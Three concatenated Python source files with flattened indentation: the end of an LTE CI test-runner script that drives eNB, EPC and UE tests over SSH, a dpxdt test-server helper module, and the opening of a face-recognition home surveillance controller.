matchReg = re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBSourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1SourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2SourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCIPAddress = matchReg.group(1)
elif re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCBranch = matchReg.group(1)
elif re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCUserName = matchReg.group(1)
elif re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCPassword = matchReg.group(1)
elif re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE)
if re.match('OAI', matchReg.group(1), re.IGNORECASE) or re.match('ltebox', matchReg.group(1), re.IGNORECASE) or re.match('OAI-Rel14-CUPS', matchReg.group(1), re.IGNORECASE):
SSH.EPCType = matchReg.group(1)
else:
sys.exit('Invalid EPC Type: ' + matchReg.group(1) + ' -- (should be OAI or ltebox or OAI-Rel14-CUPS)')
elif re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBIPAddress = matchReg.group(1)
elif re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBUserName = matchReg.group(1)
elif re.match('^\-\-ADBType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBType=(.+)$', myArgv, re.IGNORECASE)
if re.match('centralized', matchReg.group(1), re.IGNORECASE) or re.match('distributed', matchReg.group(1), re.IGNORECASE):
if re.match('distributed', matchReg.group(1), re.IGNORECASE):
SSH.ADBCentralized = False
else:
SSH.ADBCentralized = True
else:
sys.exit('Invalid ADB Type: ' + matchReg.group(1) + ' -- (should be centralized or distributed)')
elif re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBPassword = matchReg.group(1)
elif re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE)
SSH.testXMLfiles.append(matchReg.group(1))
SSH.nbTestXMLfiles += 1
elif re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.UEIPAddress = matchReg.group(1)
elif re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.UEUserName = matchReg.group(1)
elif re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.UEPassword = matchReg.group(1)
elif re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.UESourceCodePath = matchReg.group(1)
elif re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE)
finalStatus = matchReg.group(1)
if ((finalStatus == 'true') or (finalStatus == 'True')):
SSH.finalStatus = True
else:
Usage()
sys.exit('Invalid Parameter: ' + myArgv)
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.eNB_serverId = '0'
SSH.eNB_instance = '0'
SSH.eNBSourceCodePath = '/tmp/'
SSH.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateUE()
elif re.match('^TerminateOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateOAIUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
if (SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '') and (SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == ''):
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectIperf()
elif re.match('^LogCollectOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectOAIUE()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
count = 0
foundCount = 0
while (count < SSH.nbTestXMLfiles):
		xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[count]
if (os.path.isfile(xml_test_file)):
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-' + str(count)))
SSH.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
foundCount += 1
count += 1
if foundCount != SSH.nbTestXMLfiles:
SSH.nbTestXMLfiles = foundCount
SSH.CreateHtmlHeader()
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
SSH.CreateHtmlFooter(SSH.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE) or re.match('^TestUE$', mode, re.IGNORECASE):
if re.match('^TesteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '' or SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '' or SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/tcp_iperf_stats.awk", "/tmp")
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/active_net_interfaces.awk", "/tmp")
else:
if SSH.UEIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('UE: Insufficient Parameter')
#read test_case_list.xml file
# if no parameters for XML file, use default value
if (SSH.nbTestXMLfiles != 1):
xml_test_file = cwd + "/test_case_list.xml"
else:
xml_test_file = cwd + "/" + SSH.testXMLfiles[0]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
if (SSH.nbTestXMLfiles == 1):
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-0'))
repeatCount = xmlRoot.findtext('repeatCount',default='1')
SSH.repeatCounts.append(int(repeatCount))
all_tests=xmlRoot.findall('testCase')
exclusion_tests=exclusion_tests.split()
requested_tests=requested_tests.split()
#check that exclusion tests are well formatted
#(6 digits or less than 6 digits followed by +)
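	# e.g. '030201' targets that single case, while '0302+' covers every id starting with '0302'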
for test in exclusion_tests:
if (not re.match('^[0-9]{6}$', test) and
not re.match('^[0-9]{1,5}\+$', test)):
logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
sys.exit(1)
else:
logging.debug(test)
#check that requested tests are well formatted
#(6 digits or less than 6 digits followed by +)
#be verbose
for test in requested_tests:
if (re.match('^[0-9]{6}$', test) or
re.match('^[0-9]{1,5}\+$', test)):
logging.debug('INFO: test group/case requested: ' + test)
else:
logging.debug('ERROR: requested test is invalidly formatted: ' + test)
sys.exit(1)
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.CheckFlexranCtrlInstallation()
#get the list of tests to be done
todo_tests=[]
for test in requested_tests:
if (test_in_list(test, exclusion_tests)):
logging.debug('INFO: test will be skipped: ' + test)
else:
#logging.debug('INFO: test will be run: ' + test)
todo_tests.append(test)
signal.signal(signal.SIGUSR1, receive_signal)
SSH.CreateHtmlTabHeader()
cnt = 0
SSH.prematureExit = True
SSH.startTime = int(round(time.time() * 1000))
while cnt < SSH.repeatCounts[0] and SSH.prematureExit:
SSH.prematureExit = False
for test_case_id in todo_tests:
if SSH.prematureExit:
break
for test in all_tests:
if SSH.prematureExit:
break
id = test.get('id')
if test_case_id != id:
continue
SSH.testCase_id = id
SSH.desc = test.findtext('desc')
action = test.findtext('class')
if (CheckClassValidity(action, id) == False):
continue
SSH.ShowTestID()
GetParametersFromXML(action)
if action == 'Initialize_UE' or action == 'Attach_UE' or action == 'Detach_UE' or action == 'Ping' or action == 'Iperf' or action == 'Reboot_UE' or action == 'DataDisable_UE' or action == 'DataEnable_UE' or action == 'CheckStatusUE':
if (SSH.ADBIPAddress != 'none'):
terminate_ue_flag = False
SSH.GetAllUEDevices(terminate_ue_flag)
if action == 'Build_eNB':
SSH.BuildeNB()
elif action == 'WaitEndBuild_eNB':
SSH.WaitBuildeNBisFinished()
elif action == 'Initialize_eNB':
SSH.InitializeeNB()
elif action == 'Terminate_eNB':
SSH.TerminateeNB()
elif action == 'Initialize_UE':
SSH.InitializeUE()
elif action == 'Terminate_UE':
SSH.TerminateUE()
elif action == 'Attach_UE':
SSH.AttachUE()
elif action == 'Detach_UE':
SSH.DetachUE()
elif action == 'DataDisable_UE':
SSH.DataDisableUE()
elif action == 'DataEnable_UE':
SSH.DataEnableUE()
elif action == 'CheckStatusUE':
SSH.CheckStatusUE()
elif action == 'Build_OAI_UE':
SSH.BuildOAIUE()
elif action == 'Initialize_OAI_UE':
SSH.InitializeOAIUE()
elif action == 'Terminate_OAI_UE':
SSH.TerminateOAIUE()
elif action == 'Initialize_CatM_module':
SSH.InitializeCatM()
elif action == 'Terminate_CatM_module':
SSH.TerminateCatM()
elif action == 'Attach_CatM_module':
SSH.AttachCatM()
elif action == 'Detach_CatM_module':
SSH.TerminateCatM()
elif action == 'Ping_CatM_module':
SSH.PingCatM()
elif action == 'Ping':
SSH.Ping()
elif action == 'Iperf':
SSH.Iperf()
elif action == 'Reboot_UE':
SSH.RebootUE()
elif action == 'Initialize_HSS':
SSH.InitializeHSS()
elif action == 'Terminate_HSS':
SSH.TerminateHSS()
elif action == 'Initialize_MME':
SSH.InitializeMME()
elif action == 'Terminate_MME':
SSH.TerminateMME()
elif action == 'Initialize_SPGW':
SSH.InitializeSPGW()
elif action == 'Terminate_SPGW':
SSH.TerminateSPGW()
elif action == 'Initialize_FlexranCtrl':
SSH.InitializeFlexranCtrl()
elif action == 'Terminate_FlexranCtrl':
SSH.TerminateFlexranCtrl()
elif action == 'IdleSleep':
SSH.IdleSleep()
elif action == 'Perform_X2_Handover':
SSH.Perform_X2_Handover()
else:
sys.exit('Invalid action')
cnt += 1
if cnt == SSH.repeatCounts[0] and SSH.prematureExit:
logging.debug('Testsuite failed ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(False)
sys.exit('Failed Scenario')
else:
logging.info('Testsuite passed after ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(True)
else:
Usage()
sys.exit('Invalid mode')
sys.exit(0)
|
test_utils.py
|
#!/usr/bin/env python
# Copyright 2015 Brett Slatkin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import socket
import tempfile
import threading
# Local libraries
import gflags
FLAGS = gflags.FLAGS
# Local modules
from dpxdt import server
from dpxdt.server import db
def get_free_port():
"""Returns a free port number to listen on for testing."""
sock = socket.socket()
sock.bind(('', 0))
return sock.getsockname()[1]
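# Caveat: the port is only guaranteed to be free at bind time; a small race
# window remains before the caller rebinds it. Usage sketch (hypothetical):
#   port = get_free_port()
#   my_server.listen(port)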
def start_server():
"""Starts the dpxdt server and returns its main thread."""
server_port = get_free_port()
FLAGS.fetch_frequency = 100
FLAGS.fetch_threads = 1
FLAGS.capture_timeout = 60
FLAGS.polltime = 1
FLAGS.queue_idle_poll_seconds = 1
FLAGS.queue_busy_poll_seconds = 1
FLAGS.queue_server_prefix = (
'http://localhost:%d/api/work_queue' % server_port)
FLAGS.release_server_prefix = 'http://localhost:%d/api' % server_port
db_path = tempfile.mktemp(suffix='.db')
logging.info('sqlite path used in tests: %s', db_path)
server.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + db_path
db.drop_all()
db.create_all()
server.app.config['CSRF_ENABLED'] = False
server.app.config['IGNORE_AUTH'] = True
server.app.config['TESTING'] = True
run = lambda: server.app.run(debug=False, host='0.0.0.0', port=server_port)
server_thread = threading.Thread(target=run)
server_thread.daemon = True
server_thread.start()
return server_thread
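# Typical test setup sketch (hypothetical client and endpoint names):
#   server_thread = start_server()
#   response = some_client.get(FLAGS.release_server_prefix + '/some_endpoint')
# The thread is a daemon, so it dies with the test process and needs no teardown.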
def debug_log_everything():
logging.getLogger().setLevel(logging.DEBUG)
for name in logging.Logger.manager.loggerDict.keys():
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
|
SurveillanceSystem.py
|
# Surveillance System Controller.
# Brandon Joffe
# 2016
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code used in this project included opensource software (Openface)
# developed by Brandon Amos
# Copyright 2015-2016 Carnegie Mellon University
import time
import argparse
import cv2
import os
import pickle
from operator import itemgetter
import numpy as np
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.lda import LDA
from sklearn.preprocessing import LabelEncoder
from sklearn.svm import SVC
from sklearn.mixture import GMM
import dlib
import atexit
from subprocess import Popen, PIPE
import os.path
import sys
import logging
from logging.handlers import RotatingFileHandler
import threading
import time
from datetime import datetime, timedelta
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEBase import MIMEBase
from email import encoders
import requests
import json
from openface.data import iterImgs
import Camera
import FaceRecogniser
import openface
import aligndlib
import ImageUtils
import random
import psutil
import math
# Get paths for models
# //////////////////////////////////////////////////////////////////////////////////////////////
fileDir = os.path.dirname(os.path.realpath(__file__))
luaDir = os.path.join(fileDir, '..', 'batch-represent')
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
parser = argparse.ArgumentParser()
parser.add_argument('--dlibFacePredictor',
type=str, help="Path to dlib's face predictor.",
default=os.path.join(dlibModelDir , "shape_predictor_68_face_landmarks.dat"))
parser.add_argument('--networkModel',
type=str, help="Path to Torch network model.",
default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int, help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--unknown', type=bool, default=False, help='Try to predict unknown people')
args = parser.parse_args()
start = time.time()
np.set_printoptions(precision=2)
try:
os.makedirs('logs', exist_ok=True) # Python>3.2
except TypeError:
try:
os.makedirs('logs')
except OSError as exc: # Python >2.5
print "logging directory already exist"
logger = logging.getLogger()
formatter = logging.Formatter("(%(threadName)-10s) %(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler = RotatingFileHandler("logs/surveillance.log", maxBytes=10000000, backupCount=10)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
class SurveillanceSystem(object):
""" The SurveillanceSystem object is the heart of this application.
It provides all the central proccessing and ties everything
together. It generates camera frame proccessing threads as
well as an alert monitoring thread. A camera frame proccessing
thread can process a camera using 5 different processing methods.
These methods aim to allow the user to adapt the system to their
needs and can be found in the process_frame() function. The alert
monitoring thread continually checks the system state and takes
action if a particular event occurs. """
def __init__(self):
self.recogniser = FaceRecogniser.FaceRecogniser()
self.trainingEvent = threading.Event() # Used to halt processing while training the classifier
self.trainingEvent.set()
self.drawing = True
self.alarmState = 'Disarmed' # Alarm states - Disarmed, Armed, Triggered
self.alarmTriggerd = False
self.alerts = [] # Holds all system alerts
self.cameras = [] # Holds all system cameras
self.camerasLock = threading.Lock() # Used to block concurrent access of cameras []
self.cameraProcessingThreads = []
self.peopleDB = []
self.confidenceThreshold = 20 # Used as a threshold to classify a person as unknown
# Initialization of alert processing thread
self.alertsLock = threading.Lock()
self.alertThread = threading.Thread(name='alerts_process_thread_',target=self.alert_engine,args=())
self.alertThread.daemon = False
self.alertThread.start()
# Used for testing purposes
###################################
self.testingResultsLock = threading.Lock()
self.detetectionsCount = 0
self.trueDetections = 0
self.confidence_sum = 0 # Running sum of confidences, used by the "testing" camera function
self.counter = 0
####################################
self.get_face_database_names() # Gets people in database for web client
#//////////////////////////////////////////////////// Camera Examples ////////////////////////////////////////////////////
#self.cameras.append(Camera.IPCamera("testing/iphoneVideos/singleTest.m4v","detect_recognise_track",False)) # Video Example - uncomment and run code
# self.cameras.append(Camera.IPCamera("http://192.168.1.33/video.mjpg","detect_recognise_track",False))
# processing frame threads
for i, cam in enumerate(self.cameras):
thread = threading.Thread(name='frame_process_thread_' + str(i),target=self.process_frame,args=(cam,))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
def add_camera(self, camera):
"""Adds new camera to the System and generates a
frame processing thread"""
self.cameras.append(camera)
thread = threading.Thread(name='frame_process_thread_' +
str(len(self.cameras)),
target=self.process_frame,
args=(self.cameras[-1],))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
def remove_camera(self, camID):
"""Removes a camera from the System and stops its processing thread"""
self.cameras[camID].captureThread.stop = True # Signal the capture thread to stop before removing the camera
self.cameras.pop(camID)
self.cameraProcessingThreads.pop(camID)
def process_frame(self,camera):
"""This function performs all the frame proccessing.
It reads frames captured by the IPCamera instance,
resizes them, and performs 1 of 5 functions"""
logger.debug('Processing Frames')
state = 1
frame_count = 0
FPScount = 0 # Used to calculate frame rate at which frames are being processed
FPSstart = time.time()
start = time.time()
while not camera.captureThread.stop: # Re-read the stop flag every iteration so the thread can be shut down
frame_count += 1
logger.debug("Reading Frame")
frame = camera.read_frame()
if frame is None or np.array_equal(frame, camera.tempFrame): # Checks to see if the new frame is the same as the previous frame
continue
frame = ImageUtils.resize(frame)
height, width, channels = frame.shape
# Frame rate calculation
if FPScount == 6:
camera.processingFPS = 6/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
FPScount += 1
camera.tempFrame = frame
##################################################################################################################################################
#<###########################################################> MOTION DETECTION <################################################################>
##################################################################################################################################################
if camera.cameraFunction == "detect_motion":
camera.motion, mframe = camera.motionDetector.detect_movement(frame, get_rects = False)
camera.processing_frame = mframe
if camera.motion == False:
logger.debug('//// NO MOTION DETECTED /////')
continue
else:
logger.debug('/// MOTION DETECTED ///')
##################################################################################################################################################
#<#####################################################> FACE DETECTION AND RECOGNTIION <#########################################################>
##################################################################################################################################################
elif camera.cameraFunction == "detect_recognise":
# This approach performs basic face detection and
# recognition using OpenCV, dlib and OpenFace
training_blocker = self.trainingEvent.wait()
frame = cv2.flip(frame, 1) # Mirror the frame horizontally before detection
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
for face_bb in camera.faceBoxes:
# Used to reduce false positives from the OpenCV Haar cascade detector.
# If the face isn't detected using more rigorous parameters in the detectMultiScale() function, read the next frame
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
# returns a dictionary that contains name, confidence and representation and an alignedFace (numpy array)
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
with camera.peopleDictLock:
# If the person has already been detected and the new confidence is greater, update the person's details, otherwise create a new person
if camera.people.has_key(predictions['name']):
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
camera.processing_frame = frame # Used for streaming processed frames to the client and email alerts, but mainly used for testing purposes
##################################################################################################################################################
#<#####################################> MOTION DETECTION EVENT FOLLOWED BY FACE DETECTION AND RECOGNITION <#####################################>
##################################################################################################################################################
elif camera.cameraFunction == "motion_detect_recognise":
# When motion is detected, consecutive frames are processed for faces.
# If no faces are detected for longer than 30 seconds the thread goes back to
# looking for motion
training_blocker = self.trainingEvent.wait()
if state == 1: # If no faces have been found or there has been no movement
camera.motion, mframe = camera.motionDetector.detect_movement(frame, get_rects = False)
if camera.motion == True:
logger.debug('////////////////////// MOTION DETECTED //////////////////////')
state = 2
camera.processing_frame = mframe
else:
logger.debug('////////////////////// NO MOTION DETECTED //////////////////////')
continue
elif state == 2: # If motion has been detected
if frame_count == 0:
start = time.time()
frame_count += 1
frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
if len(camera.faceBoxes) == 0:
if (time.time() - start) > 30.0:
logger.info('// No faces found for ' + str(time.time() - start) + ' seconds - Going back to Motion Detection Mode')
state = 1
frame_count = 0
else:
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' ////')
# frame = cv2.flip(frame, 1)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
with camera.peopleDictLock:
if camera.people.has_key(predictions['name']):
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
start = time.time() # Used to go back to the motion detection state after 30s of not finding a face
camera.processing_frame = frame
###################################################################################################################################################################
#<#####################################> MOTION DETECTION OBJECT SEGMENTAION FOLLOWED BY FACE DETECTION AND RECOGNITION <#####################################>
####################################################################################################################################################################
elif camera.cameraFunction == "segment_detect_recognise":
# This approach uses background subtraction to segment a region of
# interest that is likely to contain a person. The region is cropped from
# the frame and face detection is performed on a much smaller image. This
# improves processing performance but is highly dependent upon the accuracy of
# the background model generated by the MotionDetector object.
training_blocker = self.trainingEvent.wait()
camera.motion, peopleRects = camera.motionDetector.detect_movement(frame, get_rects = True)
if camera.motion == False:
camera.processing_frame = frame
logger.debug('////-- NO MOTION DETECTED --////')
continue
logger.debug('///// MOTION DETECTED /////')
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for x, y, w, h in peopleRects:
logger.debug('//// Processing People Segmented Areas ///')
bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
personimg = ImageUtils.crop(frame, bb, dlibRect = True)
personimg = cv2.flip(personimg, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(personimg,camera.dlibDetection)
if self.drawing == True:
camera.processing_frame = ImageUtils.draw_boxes(frame, peopleRects, False)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
